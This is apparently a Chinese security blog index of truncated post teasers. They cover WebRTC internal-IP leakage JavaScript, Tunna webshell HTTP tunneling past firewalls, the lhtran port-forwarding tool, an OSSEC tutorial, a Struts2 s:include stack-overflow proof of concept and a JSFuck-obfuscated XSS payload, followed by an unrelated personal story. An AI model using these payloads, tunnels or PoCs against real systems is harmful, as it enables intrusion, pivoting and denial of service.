一段通过WebRTC获取客户端内网IP的js (无需java/ActiveX支持)

已在chrome firefox下测试 <script> // NOTE: window.RTCPeerConnection is "not a constructor" in FF22/23 var RTCPeerConnection = /*window.RTCPeerConnection ||*/ window.webkitRTCPeerConnection || window.mozRTCPeerConnection; if (RTCPeerConnection) (function () { var rtc = new RTCPeerConnection({iceServers:[]}); if (window.mozRTCPeerConnection) { // FF needs a channel/stream to proceed rtc.createDataChannel('', {reliable:false}); }; rtc.onicecandidate = function (evt) { if (evt.candidate) grepSDP(evt.candidate.candidate); }; rtc.createOffer(function (offerDesc)

tunna工具使用实例

原理:就是个HTTP tunneling工具 +-------------------------------------------+ +-------------------------------------------+ | Local Host | | Remote Host | |-------------------------------------------| |-------------------------------------------| | +----------+ +------------+ | +-------------+ | +------------+ +----------+ | | |Client App|+----->|Local Proxy |<==========| Firewall |======>| Webshell |+------>|Server App| | | +----------+ +------------+ | +-------------+ | +------------+ +----------+ | +-------------------------------------------+ +------------------------------------------ + 可以看出该

Mac os的端口转发工具。改了下代码,编译通过

/* ************************************************************************************ * * Lhtran.c - Packet Transmit Tool For Unix/Linux. * * Copyright (C) 2000-2004 HUC All Rights Reserved. * * Author : lion Date : 2003-10-20 * * Rewritten by W.Z.T Date :2006-3-22 * * Sepcial thx lion for his htran.c for win,Thank you:) * * Complie : gcc -o lhtran lhtran.c -lpthread * * Usage ./lhtran * : ======================== Packet Transmit Tool V1.01 For Unix/Linux ==================== *

OSSEC 学习教程一

简介 写在前面的话,网上能够找到一些关于ossec方面的资料,虽然很少,但是总比没有强,不过在实际的使用过程中还是会碰到许多稀奇古怪的问题。整

Struts2解析某些value值的include标签,webServer StackOverflow

比如: <s:include value="" /> <s:include value="." /> <s:include value="/" /> <s:include value="?" /> poc.jsp: <%@ page language="java" contentType="text/html; charset=utf-8" pageEncoding="utf-8"%> <%@ taglib prefix="s" uri="/struts-tags"%> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title></title> </head> <body> <s:include value="" />PoC </body> </html> 访问poc.jsp后发现,webServer

把储存型XSS变成反射型XSS 突破长度限制

把储存型XSS变成反射型XSS 突破长度限制 LaiX ([][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+(!![]+[])[+[[+[]]]]+(!![]+[])[+[[!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+!+[]]]]][([][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+) | 2013-09-17 19:08 如果我们遇到了有长度限制怎么办?难道就真的无法利用然后放弃吗?其实我们可以将有限空间发挥

奇人李铁马(三)

作者:囧白猫 再联系上的时候我已经在上海成功渡过最最难熬的第一年,同时神奇地跨行业进入互联网的世界。面试我的负责人因为周末无聊翻简历一时好奇把